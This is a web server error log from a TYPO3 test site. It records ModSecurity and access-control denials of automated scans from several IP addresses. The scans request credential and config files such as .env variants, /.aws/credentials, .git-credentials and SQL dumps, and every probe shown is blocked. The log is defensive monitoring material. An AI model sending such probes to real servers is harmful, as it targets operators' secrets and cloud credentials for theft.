[Thu Jan 08 18:22:57.413195 2026] [:error] [pid 1270035] [client 45.148.10.158:32712] [client 45.148.10.158] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aV_n8SYqm_i2BUcmtQb4IgAAAAA"]
[Thu Jan 08 18:22:57.413414 2026] [:error] [pid 1270035] [client 45.148.10.158:32712] [client 45.148.10.158] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aV_n8SYqm_i2BUcmtQb4IgAAAAA"]
[Thu Jan 08 18:22:57.413575 2026] [:error] [pid 1270035] [client 45.148.10.158:32712] [client 45.148.10.158] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aV_n8SYqm_i2BUcmtQb4IgAAAAA"]
[Thu Jan 08 18:23:00.386738 2026] [authz_core:error] [pid 1270037] [client 45.148.10.158:32728] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.env.bak
[Thu Jan 08 18:23:03.003221 2026] [:error] [pid 1283304] [client 45.148.10.158:32750] [client 45.148.10.158] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aV_n92AwUIZgFNkik8yUuAAAAAg"]
[Thu Jan 08 18:23:03.003364 2026] [:error] [pid 1283304] [client 45.148.10.158:32750] [client 45.148.10.158] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aV_n92AwUIZgFNkik8yUuAAAAAg"]
[Thu Jan 08 18:23:03.003602 2026] [:error] [pid 1283304] [client 45.148.10.158:32750] [client 45.148.10.158] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aV_n92AwUIZgFNkik8yUuAAAAAg"]
[Thu Jan 08 18:23:03.003753 2026] [:error] [pid 1283304] [client 45.148.10.158:32750] [client 45.148.10.158] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aV_n92AwUIZgFNkik8yUuAAAAAg"]
[Thu Jan 08 18:23:05.929520 2026] [:error] [pid 1280390] [client 45.148.10.158:3896] [client 45.148.10.158] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aV_n-dKTJIy7S9W5nL2KXgAAAAk"]
[Thu Jan 08 18:23:05.929742 2026] [:error] [pid 1280390] [client 45.148.10.158:3896] [client 45.148.10.158] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aV_n-dKTJIy7S9W5nL2KXgAAAAk"]
[Thu Jan 08 18:23:05.929908 2026] [:error] [pid 1280390] [client 45.148.10.158:3896] [client 45.148.10.158] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aV_n-dKTJIy7S9W5nL2KXgAAAAk"]
[Thu Jan 08 18:23:07.581252 2026] [:error] [pid 1270041] [client 45.148.10.158:3908] [client 45.148.10.158] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aV_n-83GwEx_BV8-CrWTyQAAAAU"]
[Thu Jan 08 18:23:07.581438 2026] [:error] [pid 1270041] [client 45.148.10.158:3908] [client 45.148.10.158] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aV_n-83GwEx_BV8-CrWTyQAAAAU"]
[Thu Jan 08 18:23:07.582156 2026] [:error] [pid 1270041] [client 45.148.10.158:3908] [client 45.148.10.158] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aV_n-83GwEx_BV8-CrWTyQAAAAU"]
[Thu Jan 08 18:23:07.582328 2026] [:error] [pid 1270041] [client 45.148.10.158:3908] [client 45.148.10.158] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aV_n-83GwEx_BV8-CrWTyQAAAAU"]
[Thu Jan 08 18:23:10.234789 2026] [:error] [pid 1270043] [client 45.148.10.158:3918] [client 45.148.10.158] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aV_n_gvEr1EpOYnVfM6rJAAAAAc"]
[Thu Jan 08 18:23:10.235005 2026] [:error] [pid 1270043] [client 45.148.10.158:3918] [client 45.148.10.158] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aV_n_gvEr1EpOYnVfM6rJAAAAAc"]
[Thu Jan 08 18:23:10.235162 2026] [:error] [pid 1270043] [client 45.148.10.158:3918] [client 45.148.10.158] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aV_n_gvEr1EpOYnVfM6rJAAAAAc"]
[Thu Jan 08 18:23:12.571945 2026] [:error] [pid 1270036] [client 45.148.10.158:3928] [client 45.148.10.158] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "aV_oAOM1154Q6b0hewijCQAAAAE"]
[Thu Jan 08 18:23:12.572173 2026] [:error] [pid 1270036] [client 45.148.10.158:3928] [client 45.148.10.158] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "aV_oAOM1154Q6b0hewijCQAAAAE"]
[Thu Jan 08 18:23:12.572328 2026] [:error] [pid 1270036] [client 45.148.10.158:3928] [client 45.148.10.158] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "aV_oAOM1154Q6b0hewijCQAAAAE"]
[Thu Jan 08 18:23:40.965032 2026] [:error] [pid 1270039] [client 45.148.10.158:39914] [client 45.148.10.158] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aV_oHJccQYhM1DUhi_W6LQAAAAQ"]
[Thu Jan 08 18:23:40.965266 2026] [:error] [pid 1270039] [client 45.148.10.158:39914] [client 45.148.10.158] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aV_oHJccQYhM1DUhi_W6LQAAAAQ"]
[Thu Jan 08 18:23:40.965430 2026] [:error] [pid 1270039] [client 45.148.10.158:39914] [client 45.148.10.158] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aV_oHJccQYhM1DUhi_W6LQAAAAQ"]
[Thu Jan 08 18:23:53.785339 2026] [authz_core:error] [pid 1283304] [client 45.148.10.158:59038] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/application.yml
[Thu Jan 08 18:23:57.896810 2026] [authz_core:error] [pid 1280390] [client 45.148.10.158:59052] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/wp-config.php.bak
[Thu Jan 08 18:24:00.328108 2026] [authz_core:error] [pid 1270041] [client 45.148.10.158:59056] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config.php.bak
[Thu Jan 08 18:24:09.586842 2026] [authz_core:error] [pid 1270039] [client 45.148.10.158:34344] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Thu Jan 08 18:24:11.493600 2026] [authz_core:error] [pid 1270038] [client 45.148.10.158:34346] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Thu Jan 08 18:24:14.148552 2026] [authz_core:error] [pid 1270035] [client 45.148.10.158:8050] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.gitignore
[Thu Jan 08 18:24:16.923887 2026] [authz_core:error] [pid 1270037] [client 45.148.10.158:8056] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git-credentials
[Thu Jan 08 18:24:19.465102 2026] [authz_core:error] [pid 1283304] [client 45.148.10.158:8068] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.gitconfig
[Thu Jan 08 18:26:53.337442 2026] [:error] [pid 1270043] [client 45.82.13.170:37264] [client 45.82.13.170] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aV_o3QvEr1EpOYnVfM6rLAAAAAc"]
[Thu Jan 08 18:26:53.337718 2026] [:error] [pid 1270043] [client 45.82.13.170:37264] [client 45.82.13.170] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aV_o3QvEr1EpOYnVfM6rLAAAAAc"]
[Thu Jan 08 18:26:53.337874 2026] [:error] [pid 1270043] [client 45.82.13.170:37264] [client 45.82.13.170] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aV_o3QvEr1EpOYnVfM6rLAAAAAc"]
[Thu Jan 08 19:42:31.147655 2026] [authz_core:error] [pid 1283304] [client 136.118.139.52:53192] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Thu Jan 08 21:09:55.337623 2026] [authz_core:error] [pid 1270035] [client 195.178.110.161:38510] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Thu Jan 08 21:15:39.552786 2026] [:error] [pid 1270042] [client 18.119.100.98:43690] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWAQay7RlX2cRjHcFz6xnAAAAAY"]
[Thu Jan 08 21:15:39.553030 2026] [:error] [pid 1270042] [client 18.119.100.98:43690] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWAQay7RlX2cRjHcFz6xnAAAAAY"]
[Thu Jan 08 21:15:39.553200 2026] [:error] [pid 1270042] [client 18.119.100.98:43690] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWAQay7RlX2cRjHcFz6xnAAAAAY"]
[Thu Jan 08 21:15:39.896603 2026] [authz_core:error] [pid 1283304] [client 18.119.100.98:43786] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/error.log
[Thu Jan 08 21:15:40.619433 2026] [authz_core:error] [pid 1270043] [client 18.119.100.98:44048] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/storage
[Thu Jan 08 21:15:40.966845 2026] [authz_core:error] [pid 1270036] [client 18.119.100.98:44176] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/database.sql
[Thu Jan 08 21:15:41.316989 2026] [authz_core:error] [pid 1270037] [client 18.119.100.98:44272] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/backup.sql
[Thu Jan 08 21:15:41.665596 2026] [authz_core:error] [pid 1270035] [client 18.119.100.98:44390] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/debug.log
[Thu Jan 08 21:15:42.371362 2026] [authz_core:error] [pid 1270041] [client 18.119.100.98:44616] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/dump.sql
[Thu Jan 08 21:15:42.718795 2026] [:error] [pid 1270039] [client 18.119.100.98:44730] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aWAQbpccQYhM1DUhi_W65QAAAAQ"]
[Thu Jan 08 21:15:42.719002 2026] [:error] [pid 1270039] [client 18.119.100.98:44730] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aWAQbpccQYhM1DUhi_W65QAAAAQ"]
[Thu Jan 08 21:15:42.719185 2026] [:error] [pid 1270039] [client 18.119.100.98:44730] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aWAQbpccQYhM1DUhi_W65QAAAAQ"]
[Thu Jan 08 21:15:43.798719 2026] [:error] [pid 1280390] [client 18.119.100.98:45094] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aWAQb9KTJIy7S9W5nL2LHAAAAAk"]
[Thu Jan 08 21:15:43.798925 2026] [:error] [pid 1280390] [client 18.119.100.98:45094] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aWAQb9KTJIy7S9W5nL2LHAAAAAk"]
[Thu Jan 08 21:15:43.799074 2026] [:error] [pid 1280390] [client 18.119.100.98:45094] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aWAQb9KTJIy7S9W5nL2LHAAAAAk"]
